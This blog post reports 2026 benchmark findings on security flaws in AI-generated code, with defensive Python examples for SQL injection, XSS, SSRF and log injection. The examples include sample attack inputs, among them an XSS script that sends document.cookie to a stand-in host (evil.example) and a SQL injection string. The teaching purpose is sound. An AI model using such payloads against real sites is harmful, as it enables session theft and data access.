Two Years of AI Progress. Security Rate: Still 55%.
Veracode tested 100+ AI models; 45% of the code they generated introduced known security flaws — identical to 2024. The security rate hasn't moved in two years.
Published by GitIntel Research
TLDR
- Veracode tested 100+ AI models: 55% security pass rate — unchanged since 2024
- Java's security failure rate sits at 72%, the worst of any mainstream language
- Reasoning models (extended chain-of-thought) reach 70–72% pass rates — the only category that moved the needle
- AI-generated code is 2.74x more likely to contain XSS vulnerabilities than human-written code
- The dataflow analysis problem — tracking tainted input across functions — remains unsolved by every model tested
In 45% of code generation tasks, the model introduces a known security flaw. That number comes from Veracode's Spring 2026 GenAI Code Security Report, which tested over 100 AI models against a standardized set of coding tasks and ran the output through static analysis. The result: a 55% security pass rate, identical to Veracode's 2024 baseline within statistical noise.
Two years of model scaling, RLHF tuning, and architectural improvements. Trillions of training tokens. Hundreds of billions of dollars in GPU infrastructure. The security rate didn't move.
The Data: Five Findings That Matter
1. The 55% Line Is a Ceiling, Not a Floor
Veracode has run this benchmark since 2024, deliberately testing what models produce "out of the box" without security-specific prompting. The methodology matters: this measures default behavior, which is what most developers actually encounter. Across all models and all tasks, the pass rate has hovered between 45% and 55% for two consecutive years.
Model size doesn't fix it. Veracode's data shows 20B-parameter models at ~52% and 400B-parameter models at ~56%. A 4-percentage-point spread across a 20x increase in model size. The security gap isn't a scale problem.
2. Java Is Regressing
Java stands alone with a 72% security failure rate. Python, C#, and JavaScript cluster between 38% and 45%. The gap is widening, not closing.
The explanation is structural. Java security patterns are verbose by design: prepared statements, input validation chains, output encoding across multiple layers. These patterns require deliberate, multi-step construction. AI models optimize for brevity and functional correctness. Java security is the opposite of brief.
Veracode's analysis points to a more specific cause: models are over-trained on legacy Java code. Millions of Stack Overflow answers and GitHub repositories contain pre-2015 Java patterns that were standard practice before modern security frameworks existed. The models default to what they learned most of, which happens to be insecure.
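The pattern gap is concrete. A minimal sketch using Python's built-in sqlite3 module shows the two shapes side by side — the interpolated query that legacy training data is full of, and the parameterized form (the same discipline Java's `PreparedStatement` enforces):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

user_input = "alice' OR '1'='1"  # attacker-controlled value

# Insecure: string interpolation builds the SQL, so the payload
# rewrites the WHERE clause and matches every row.
unsafe = conn.execute(
    f"SELECT role FROM users WHERE name = '{user_input}'"
).fetchall()

# Secure: a parameterized query keeps the value out of the SQL
# grammar entirely (PreparedStatement is the Java equivalent).
safe = conn.execute(
    "SELECT role FROM users WHERE name = ?", (user_input,)
).fetchall()

print(unsafe)  # [('admin',)] -- the injection matched every row
print(safe)    # []           -- no user literally named "alice' OR '1'='1"
```

The secure version is one extra argument, but it's a pattern, not a reflex — which is exactly what default-mode generation gets wrong.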
A separate study from AppSec Santa testing 6 models across 89 prompts confirmed the language effect from a different angle: JavaScript code had consistently higher vulnerability rates than Python across 5 of 6 models tested. GPT-5.2 showed the largest gap at 11.4% (Python) vs. 26.7% (JavaScript). The only model that bucked the trend was Claude Opus 4.6, which performed worse in Python (31.8%) than JavaScript (26.7%).
3. Reasoning Models Are the One Bright Spot
Models with extended reasoning — step-by-step chain-of-thought processing before generating output — reach 70–72% security pass rates. That's 15+ percentage points above the baseline. GPT-5 with extended reasoning enabled is the clearest example in Veracode's dataset.
The mechanism is intuitive: reasoning steps function as an internal code review. The model considers security implications before committing to a code pattern, increasing the chance of catching insecure constructs before they reach output. Without reasoning, models default to the shortest path to functional code, and security gets optimized away.
But 70–72% is still a 28–30% failure rate. Nearly one in three code snippets from the best-performing category still contains a known vulnerability. Better than coinflip odds, but not close to production-safe.
4. The Specific Failures Haven't Changed Either
The vulnerability classes that AI models fail on are the same ones they failed on in 2024. These aren't obscure edge cases. They're OWASP Top 10 staples, documented for decades:
| Vulnerability | AI Failure Rate | Source |
| --- | --- | --- |
| Cross-Site Scripting (CWE-80) | 86% | Veracode / Georgetown CSET |
| Log Injection (CWE-117) | 88% | Veracode / Georgetown CSET |
| SSRF (CWE-918) | Highest count (32 findings) | AppSec Santa 2026 |
| Path Traversal (CWE-22) | 12 findings across 534 samples | AppSec Santa 2026 |
| SQL Injection (CWE-89) | 47% | Georgetown CSET |
The AppSec Santa study ran 534 code samples across 6 LLMs and found injection-class weaknesses accounted for 37.1% of all confirmed vulnerabilities (65 of 175 total findings). SSRF alone produced 32 findings — the single most common vulnerability type.
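The standard SSRF defense is an outbound allowlist. A minimal sketch, using Python's standard library and a hypothetical allowlist (production code should also resolve DNS and block private IP ranges, which this does not):

```python
from urllib.parse import urlparse

# Hypothetical allowlist for illustration only.
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}

def is_safe_url(url: str) -> bool:
    """Reject any URL whose scheme or host falls outside the allowlist."""
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and parsed.hostname in ALLOWED_HOSTS

print(is_safe_url("https://api.example.com/v1/users"))         # True
print(is_safe_url("http://169.254.169.254/latest/meta-data"))  # False: cloud metadata host
print(is_safe_url("file:///etc/passwd"))                       # False: wrong scheme
```

Models fail here for the reason in the table: the fetch call usually sits far from where the URL entered the program, so nothing local signals that validation is missing.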
Compared to human-written code, Veracode's data shows AI output is 2.74x more likely to contain XSS vulnerabilities, 1.91x more likely to have insecure object references, and 1.88x more likely to ship with improper password handling.
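The XSS failure mode is the simplest to see. A minimal sketch with Python's built-in html module — real templating engines (Jinja2, React's JSX) do this escaping automatically, which is precisely what raw string interpolation skips:

```python
import html

user_bio = '<script>fetch("//evil.example/?c=" + document.cookie)</script>'

# Insecure: raw interpolation puts attacker markup straight into the page (CWE-80)
unsafe_html = f"<p>{user_bio}</p>"

# Secure: contextually escape before the value touches markup
safe_html = f"<p>{html.escape(user_bio)}</p>"

print(safe_html)  # the <script> tag is rendered inert as &lt;script&gt;...
```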
5. The Dataflow Problem Is Unsolved
This is the finding that explains the stagnation. Properly securing user input requires tracking data as it flows through function calls, variable assignments, transformation functions, and eventually reaches a sink (a database query, an HTML template, a system command). That's dataflow analysis, and no LLM has solved it.
Current transformer architectures aren't built for persistent state tracking across code spans. A user input that enters on line 12, gets assigned to a variable on line 15, passes through a transformation on line 23, and reaches an SQL query on line 47 requires maintaining a mental model of taint propagation that spans dozens of lines. Models can sometimes catch it in trivial cases (input goes directly to query on the next line). They consistently miss it when the flow crosses function boundaries or involves intermediate variables.
Veracode's data backs this up with a specific pattern: SQL injection and cryptographic algorithm choice are areas where models perform well and are improving. Both involve localized patterns — the vulnerability and the fix exist in close proximity. XSS and log injection, which require cross-function dataflow awareness, are getting worse. The models are learning local patterns. They're not learning global flow.
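Log injection illustrates the point: the fix itself is one line of sanitization, but applying it requires knowing the value is still tainted by the time it reaches the logger. A minimal sketch:

```python
import logging

logging.basicConfig(format="%(levelname)s %(message)s")
log = logging.getLogger("auth")

# Attacker-controlled username carrying an embedded newline that
# would forge a second, fake log record (CWE-117)
username = "bob\nINFO login succeeded for user admin"

# Secure: encode CR/LF so one event stays one log line
sanitized = username.replace("\r", "\\r").replace("\n", "\\n")
log.warning(f"failed login for {sanitized}")
```

The replace calls are trivial. Recognizing that `username` needs them — dozens of lines after it entered the program — is the part that requires flow tracking.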
What It Means: The Security Ceiling Problem
We covered the divergence between syntax pass rates (95%) and security pass rates (55%) two weeks ago. The Spring 2026 data turns that observation into a confirmed trend line.
The implications are different depending on where you sit:
For individual developers: The 55% rate means you should treat every AI-generated code block as unreviewed third-party code. Not because AI tools are bad, but because their failure mode is invisible. The code compiles, passes tests, and does what you asked. The vulnerability is in what it didn't do — sanitize an input, validate a boundary, restrict a permission.
For engineering leaders: The language-specific data changes how you allocate review resources. If your stack is Java-heavy and your team uses AI coding tools, you're operating at a 72% failure rate. That's not an argument to ban AI tools. It's an argument to build language-specific security gates that run automatically on every AI-attributed commit.
For security teams: The reasoning model finding suggests an immediate mitigation. For security-sensitive code paths, requiring extended reasoning mode (where available) shifts the baseline from 55% to 70%+. It's not sufficient on its own, but it's the cheapest improvement available today.
The developer trust data tells us that 97% of developers already don't fully trust AI output. The problem isn't awareness. It's workflow: AI tools are optimized for speed, and code review pipelines haven't caught up with the volume increase.
The Counter-Argument: These Benchmarks Miss the Real Workflow
The strongest objection to the 55% number is methodological. Veracode tests raw, unprompted output. No developer uses AI tools that way in practice. Real workflows involve:
- Security-specific system prompts baked into tool configuration
- Follow-up prompts asking the model to review its own output for vulnerabilities
- SAST tools running in CI that catch issues before merge
- Human review of generated code before it ships
This is a fair criticism. The BaxBench study found that when models are explicitly told to avoid known, specific vulnerabilities, pass rates jump from 56% to 69% for the best-performing model (Claude Opus 4.5 Thinking). Security prompting works.
But there are two problems with dismissing the baseline number. First, most developers don't use security-specific prompting. Veracode's methodology reflects what the average developer experiences, which is the relevant risk surface for organizations. Second, even with prompting, the best result in BaxBench was 69%. That's a 31% failure rate under optimal conditions. The ceiling moves, but it doesn't move far.
The AppSec Santa study added another dimension: 78.3% of vulnerabilities were detected by only a single SAST tool out of the five used. Your CI pipeline's single scanner is likely missing the majority of issues. Multi-tool coverage isn't optional anymore.
What to Do About It
1. Add Security Gates Per Language, Not Per Tool
The data is clear: vulnerability rates vary more by language than by model. Java at 72% and Python at 38% require different review thresholds. Configure your SAST pipeline to apply stricter rules to AI-generated Java code. Most CI systems support per-language rule configurations. Use them.
If you don't know which commits are AI-generated, that's the first problem to solve. Attribution tools (including GitIntel's Co-Authored-By trailer detection) give you a per-file breakdown. You can't apply risk-appropriate review without knowing the risk source.
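A crude version of trailer detection is easy to sketch. This is a minimal approximation, not GitIntel's method — real attribution works per-file, and the `AI_AUTHORS` set here is a hypothetical example list:

```python
# Illustrative list of AI co-author names; real tooling would match
# on the full "Name <email>" identity, not substrings.
AI_AUTHORS = {"claude", "copilot", "chatgpt"}

def has_ai_coauthor(commit_message: str) -> bool:
    """Flag commits whose Co-Authored-By trailer names a known AI tool."""
    for line in commit_message.splitlines():
        if line.lower().startswith("co-authored-by:"):
            author = line.split(":", 1)[1].lower()
            if any(name in author for name in AI_AUTHORS):
                return True
    return False

msg = "Fix login flow\n\nCo-Authored-By: Claude <noreply@anthropic.com>"
print(has_ai_coauthor(msg))  # True
```

Feed it `git log --format=%B` output commit by commit and you have a first-pass risk signal to route stricter review against.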
2. Require Reasoning Mode for Security-Sensitive Paths
The 15-percentage-point improvement from extended reasoning is the single largest effect in Veracode's dataset. For authentication flows, payment processing, data access layers, and API endpoint handlers, configure your AI tools to use reasoning/chain-of-thought mode by default. The latency cost is real (2–5x slower generation). The security improvement justifies it for code that handles user data or system permissions.
3. Run Multiple SAST Scanners
The AppSec Santa finding that 78.3% of vulnerabilities were caught by only one of five tools should change how you think about static analysis. A single scanner gives you partial coverage. Running two or three complementary tools (e.g., Semgrep + CodeQL + a language-specific linter) catches the overlapping blind spots. The marginal cost of additional scanners in CI is small compared to the cost of a shipped vulnerability.
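The arithmetic behind multi-tool coverage is simple to demonstrate. A sketch with hypothetical findings keyed on (file, line, CWE) — real scanners emit SARIF, which normalizes to roughly these fields:

```python
# Hypothetical findings from two scanners, deduplicated on (file, line, CWE)
semgrep = [("app.py", 47, "CWE-89"), ("views.py", 12, "CWE-80")]
codeql  = [("app.py", 47, "CWE-89"), ("api.py", 91, "CWE-918")]

merged = set(semgrep) | set(codeql)          # union: everything either tool saw
only_one_tool = set(semgrep) ^ set(codeql)   # findings a single tool would miss

print(len(merged))         # 3 distinct findings
print(len(only_one_tool))  # 2 of the 3 came from only one scanner
```

In this toy example two of three findings are single-tool — the same shape as the 78.3% figure, just at miniature scale. The union is what ships to your triage queue; the symmetric difference is your single-scanner blind spot.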
This isn't new advice for security teams, but the AI code volume makes it urgent. When AI tools drive a 98% increase in PRs, single-scanner coverage that was adequate for human-written code becomes insufficient for the expanded output.
The Uncomfortable Conclusion
The AI industry has spent two years making models that write code faster, more fluently, and with fewer syntax errors. None of that effort transferred to security. The 55% line held because the problem isn't about model capability — models know about XSS, SQL injection, and SSRF. It's about generation priorities. Without explicit security pressure, models optimize for what their training data rewards: code that compiles and runs correctly.
Until model architectures solve the dataflow analysis problem, or until training explicitly penalizes insecure patterns with the same weight as syntax errors, the 55% line will hold. Plan your workflows accordingly.
Sources
- Veracode Spring 2026 GenAI Code Security Report — primary dataset, 100+ models, 55% pass rate baseline
- AppSec Santa: AI Code Security Study 2026 — 6 LLMs, 534 samples, 89 prompts, OWASP Top 10 mapping
- AI Vyuh: Why 53% of AI-Generated Code Ships with Vulnerabilities — consolidated vulnerability statistics and language breakdowns
- Georgetown CSET: Cybersecurity Risks of AI-Generated Code (2024) — XSS 86%, log injection 88%, SQL injection 47% failure rates
- BaxBench / ArXiv: Guiding AI to Fix Its Own Flaws — security prompting improves pass rates from 56% to 69%
- Veracode October 2025 GenAI Code Security Report — 2024–2025 baseline comparison data
- Dark Reading: As Coders Adopt AI Agents, Security Pitfalls Lurk in 2026 — enterprise adoption and agent-specific security risks